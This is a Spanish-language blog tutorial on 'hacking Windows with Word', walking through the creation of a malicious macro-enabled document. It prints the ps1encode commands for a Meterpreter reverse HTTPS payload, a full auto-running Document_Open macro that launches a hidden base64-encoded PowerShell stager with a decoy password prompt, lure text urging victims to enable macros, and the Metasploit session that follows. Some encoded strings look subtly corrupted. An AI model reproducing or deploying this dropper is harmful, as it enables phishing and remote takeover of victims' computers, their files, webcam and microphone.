Cómo hackear windows con Word – La guía definitiva


Esta vez te hablaré de un tema muy interesante, te diré a detalle como hackear windows con Word, con esto podrás descargar, modificar los archivos del usuario, obtener acceso al micrófono, la webcam, escalar privilegios, grabar la pantalla, etc.
Para lograr realizar esta tarea recurriremos al uso de las macros de Word, si eres nuevo en este tema, te daré una breve explicación para que tengas una visión más amplia de cómo funciona esto.
Ads
IrUna macro es un conjunto de acciones o comandos que se pueden ejecutar las veces que el usuario lo desee para automatizar sus tareas o trabajos, Word incluye Microsoft Visual Basic para aplicaciones (VBA) para que podamos crear las macros, pero en este caso nosotros incrustaremos una carga útil que nos dará el acceso al ordenador del usuario que le enviaremos el documento de Word.
Puedes leer también este artículo en mi sitio web: elcursodelhacker
Información antes de hackear windows con Word
Haré mucho más interesante este artículo con unas cuantas líneas de código que se me ocurrió implementar en la macro para hacer menos sospechoso esta prueba de intrusión.
Word no es el único que incluye VBA, esto también lo encontraremos en Excel y PowerPoint, así que, si deseas realizar esto también con uno de estos documentos, te funcionará perfectamente.
Descargar e instalar PS1ENCODE para hackear Windows con Word
El primer paso que haremos es descargar una herramienta que nos permita crear la carga útil, el nombre del script que utilizaremos es ps1encode, la instalación es bastante rápida.
Instalación de ps1encode en linux:
$ git clone https://github.com/CroweCybersecurity/ps1encode
$ cd ps1encode
$ ./ps1encode.rb


Clonamos el repositorio de github con git clone https://github.com/CroweCybersecurity/ps1encode, después cambiamos de directorio con el comando cd ps1encode, para ejecutar el script teclea lo siguiente ./ps1encode.rb
Ads
IrPerfecto, ahora veamos algunos parámetros, la herramienta ya incluye un ejemplo, los datos que tienes que tener a la mano es tu dirección IP, si quieres realizar el ataque fuera de la red local necesitas saber tu dirección IP pública y dejar un puerto abierto en tu modem o enrutador, en este ejemplo lo vamos a hacer dentro de la red local, para saber tu IP abre una nueva terminal e ingresa el siguiente comando ifconfig.
Uso de PS1ENCODE
El objetivo a vulnerar es un sistema operativo Windows, utilizaremos un https reverso para recibir las conexiones, el puerto que elegiré es el 443, tu puedes escoger otro y recuerda que generaremos una carga útil para visual basic para aplicaciones (VBA), lo que te he comentado en la introducción.
./ps1encode.rb -i tudireccionip -p elpuerto -a windows/meterpreter/reverse_https -t vba


Una vez tengamos generada la carga útil, copiaremos todo el código correspondiente, en este caso comenzaremos por stringA = “power” hasta Shell stringFinal, 0 el resto no te servirá de nada.
Llego el turno de Metasploit, tienes que ponerlo a la escucha para que pueda recibir la conexión del usuario objetivo, solo ingresa los parámetros correctos, te daré una referencia.
Incrustar la carga útil en VBA de Word
Hasta el momento vamos muy bien, el siguiente paso para hackear Windows con Word es crear un nuevo documento de Word, puedes agregar algún texto que invite al usuario a habilitar las macros, por ejemplo: “HABILITA LAS MACROS PARA ACCEDER A LA INFORMACIÓN CONFIDENCIAL”.
Dirígete en la pestaña Desarrollador, si no lo encuentras, puedes agregarlo marcando la casilla Desarrollador, para esto da clic en Archivo en la parte superior izquierda, Opciones y Personalizar cinta de opciones, selecciona la casilla correspondiente; da clic en Visual Basic para continuar con el siguiente paso.
Presiona en ThisDocument, llego el momento de copiar la carga útil, pero antes de hacerlo tienes que unirlo con otra pequeña línea de código que he creado, te lo compartiré para que puedas copiarlo.
Private Sub Document_Open()
Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")
If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
Selection.Delete
Dim rngFormat As Range
Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
With rngFormat
.InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
.InsertParagraphAfter
With .Font
.Name = "Tahoma"
.Size = 24
.Bold = True
End With
End With
With ActiveDocument.Paragraphs(1)
.Alignment = wdAlignParagraphCenter
.SpaceAfter = InchesToPoints(0.5)
End With
ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If
End Sub
Todo el código que copiaste de ps1encode, lo pegaras antes de End Sub, te dejaré el ejemplo para que no comentas un error de sintaxis.
Private Sub Document_Open()
Entrada = InputBox("Ingrese la clave para acceder", "INFORMACIÓN CONFIDENCIAL")
If Entrada = "elcursodelhacker" Then
ActiveDocument.Content.Select
Selection.Delete
Dim rngFormat As Range
Set rngFormat = ActiveDocument.Range(Start:=0, End:=0)
With rngFormat
.InsertAfter Text:="INFORMACIÓN CONFIDENCIAL"
.InsertParagraphAfter
With .Font
.Name = "Tahoma"
.Size = 24
.Bold = True
End With
End With
With ActiveDocument.Paragraphs(1)
.Alignment = wdAlignParagraphCenter
.SpaceAfter = InchesToPoints(0.5)
End With
ActiveDocument.Content.InsertAfter Text:="HACKEADO"
Else
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.Content.InsertAfter Text:="LA CLAVE INTRODUCIDA ES INCORRECTA"
End If
stringA = "power"
stringB = "shell.exe -NoE -NoP -NonI -W Hidden -E "
string0 = "JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAFYAaQPorAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAH"
string1 = "MAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBj"
string2 = "ACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAPorAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALA"
string3 = "AgAEkAbgB0AFAAdAPorACAAbABwAFAAYQPorAGEAbQBlAHQAZQPorACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAPorACAAbABwAFQAaAPorAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwPorAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMA"
string4 = "dABhAHQAaQBjACAAZQB4AHQAZQPorAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwPorAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQPorAEQAZQBmAGkAbgBpAHQAaQBvAG"
string5 = "4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4ACwAMAB4ADgAZgAsADAAeAAw"
string6 = "ADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAMwAxACwAMAB4AGQAMgAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADAAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAAzADEALAAwAHgAZg"
string7 = "BmACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcAYwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAA"
string8 = "ZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADQAOQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAMgAsADAAeAAzAGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANAAwACwAMAB4ADcAOAAsADAAeAA4AD"
string9 = "UALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeAA0AGMALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA1ADAALAAwAHgAOABiACwAMAB4ADQAOAAsADAAeAAxADgALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGMALAAwAHgAMwAx"
string10 = "ACwAMAB4AGYAZgAsADAAeAA0ADkALAAwAHgAOABiACwAMAB4ADMANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAYwAwACwAMAB4AGEAYwAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3ACwAMAB4ADMAOAAsADAAeABlADAALAAwAHgANwA1ACwAMAB4AGYANA"
string11 = "AsADAAeAAwADMALAAwAHgANwBkACwAMAB4AGYAOAAsADAAeAAzAGIALAAwAHgANwBkACwAMAB4ADIANAAsADAAeAA3ADUALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIANAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAMABjACwAMAB4ADQAYgAsADAAeAA4AGIA"
string12 = "LAAwAHgANQA4ACwAMAB4ADEAYwAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAAwADQALAAwAHgAOABiACwAMAB4ADAAMQAsADAAeABkADAALAAwAHgAOAA5ACwAMAB4ADQANAAsADAAeAAyADQALAAwAHgAMgA0ACwAMAB4ADUAYgAsADAAeAA1AGIALAAwAHgANgAxACwAMAB4ADUAOQAsADAAeAA1AGEALAAwAHgANQAxAC"
string13 = "wAMAB4AGYAZgAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADUAZgAsADAAeAA1AGEALAAwAHgAOABiACwAMAB4ADEAMgAsADAAeABlADkALAAwAHgAOAAwACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADUAZAAsADAAeAA2ADgALAAwAHgANgBlACwAMAB4ADYANQAsADAAeAA3ADQALAAwAHgAMAAwACwAMAB4ADYAOAAs"
string14 = "ADAAeAA3ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgANQA0ACwAMAB4ADYAOAAsADAAeAA0AGMALAAwAHgANwA3ACwAMAB4ADIANgAsADAAeAAwADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALA"
string15 = "AwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeABiAGIALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAZQA4ACwA"
string16 = "MAB4AGIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyAGYALAAwAHgANQA5ACwAMAB4ADUANAAsADAAeAA1ADYALAAwAHgANQAxACwAMAB4ADcANwAsADAAeAA3ADgALAAwAHgAMwA5ACwAMAB4ADYAZQAsADAAeAA2ADkALAAwAHgAMwA2ACwAMAB4ADcAOQAsADAAeAA0ADYALAAwAHgANAAxACwAMAB4ADUAOQAsAD"
string17 = "AAeAA1ADEALAAwAHgANAAxACwAMAB4ADMANQAsADAAeAAzADAALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADQAYwAsADAAeAA1ADAALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeAA2ADIALAAwAHgAMgBkACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAw"
string18 = "AHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADMAMgAsADAAeABlADgALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMA"
string19 = "B4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4ADAAYQAsADAAeAA1AGYALAAwAHgANgA4ACwAMAB4ADgAMAAsADAAeAAzADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA4ADkALAAwAHgAZQAwACwAMAB4ADYAYQAsADAA"
string20 = "eAAwADQALAAwAHgANQAwACwAMAB4ADYAYQAsADAAeAAxAGYALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgANAA2ACwAMAB4ADkAZQAsADAAeAA4ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAyAGQALAAwAH"
string21 = "gAMAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANAA0ACwAMAB4AGYAMAAsADAAeAAzADUALAAwAHgAZQAwACwAMAB4"
string22 = "AGYAZgAsADAAeABkADUALAAwAHgANABmACwAMAB4ADcANQAsADAAeABjAGQALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeABiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADAAMAAsADAAeAAxADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeA"
string23 = "A2ADgALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA0ADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeAA1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAOAA5ACwAMAB4AGUANwAsADAAeAA1ADcALAAwAHgA"
string24 = "NgA4ACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeAAxADIALAAwAHgAOQA2ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANAAsADAAeABjAGQALAAwAHgAOABiACwAMAB4AD"
string25 = "AANwAsADAAeAAwADEALAAwAHgAYwAzACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4AGUANQAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADUAZgAsADAAeABlADgALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeAAzADkALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAAz"
string26 = "ADEALAAwAHgAMwA2ACwAMAB4ADMAOAAsADAAeAAyAGUALAAwAHgAMwA1ACwAMAB4ADMANgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADEALAAwAHgAMAAwADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJA"
string27 = "BzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsA"
string28 = "KwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAPorAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwPorACAAKAA7ADsAKQB7AF"
string29 = "MAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABl"
string30 = "AHMAKAAkADEAKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQ"
string31 = "PorAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADgANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAG8AbgBpACAALQBlAG4AYwAiADsAaQBlAHgAIAAiACYAIABwAG8A"
string32 = "dwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA=="
stringFinal = stringA + stringB + string0 + string1 + string2 + string3 + string4 + string5 + string6 + string7 + string8 + string9 + string10 + string11 + string12 + string13 + string14 + string15 + string16 + string17 + string18 + string19 + string20 + string21 + string22 + string23 + string24 + string25 + string26 + string27 + string28 + string29 + string30 + string31 + string32
Shell stringFinal, 0
End Sub
Eso es todo, ahora solo copia todo ese código en el documento en blanco que tienes abierto, cuanto termines de hacer lo que te dije, ciérralo.
El último paso es guardar el archivo, la extensión que tienes que elegir debe permitir el uso de las macros, nosotros seleccionaremos Documento habilitado para macros .docm, puedes elegir como alternativa Documento de Word 97-2003 .doc.
Ejecución de la Macro para hackear Windows con Word
Observemos como se ve el archivo al momento de abrirlo, en la parte superior del texto aparecerá un botón “Habilitar contenido”, si el usuario le da clic, nosotros ya tendremos acceso remoto, esto lo puedes comprobar viendo tu terminal.
Para despistar sospechas le mostrará el resto de macros, le solicitará una clave para que pueda visualizar la información que contiene el documento, en este caso es “elcursodelhacker”.
Si la clave es correcta verá la información que nosotros le hemos indicado, tu puedes modificar el texto que verás a continuación, esto es solo un ejemplo.
En caso contrario, si la clave introducida es incorrecta le mostrará el siguiente texto en el documento.
Sesión obtenida para hackear windows con Metasploit Framework
En la siguiente captura de pantalla, puedes comprobar que efectivamente ya tenemos una sesión en línea, si dominas Metasploit, ya sabes que podemos hacer con el equipo comprometido.
Veamos qué sistema operativo es, tecleamos el siguiente comando sysinfo, se trata de un Windows 10; la explicación lo dejaremos hasta aquí, espero te haya sito útil.
Puedes leer también este artículo en mi sitio web: elcursodelhacker
Respuestas